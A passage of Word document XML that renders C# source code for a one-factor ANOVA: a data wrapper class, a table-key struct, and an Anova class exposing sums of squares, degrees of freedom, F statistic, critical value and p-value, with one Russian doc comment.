    <w:p w14:paraId="4CD922A4" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4112D342" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    public class </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A3F511D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A17799C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>double[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>] Observations;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A138BA" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public int Length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A165C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>double[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>] observations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B087248" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E150A1A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            Observations = observations;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28314809" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            Length = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>observations.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A54AC7" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31326F0A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>this[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>int index]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DA95B1" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAD96F2" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            get =&gt; Observations[index];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30848E44" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            set =&gt; Observations[index] = value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852A410" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CE017" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>IEnumerator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>GetEnumerator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">) =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Observations.GetEnumerator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDDA9DE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECAAFD8" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C8D799" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    public struct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5403D229" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A256F9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        int col;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEF4D66" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        int row;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66790BB5" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>int col, int row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC30DCC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F52C4A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>this.col</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = col;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B10346" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>this.row</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = row;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D77FF3" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30548038" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C7B03F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    public class </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Anova</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BC13ACC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF9A31C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double SS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F364E0" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0971E163" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E037C1" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="001F04F3" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/// &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:t>summary</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C7C812" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/// Общее число наблюдений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F53362D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        /// &lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16523BCF" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">public int n </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD3768" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD38E5D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610949BE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public int df </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5EF48F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D8F96D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE59E85" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double F </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FF1893" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Fcrit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5EAB74" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double p </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE431C6" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
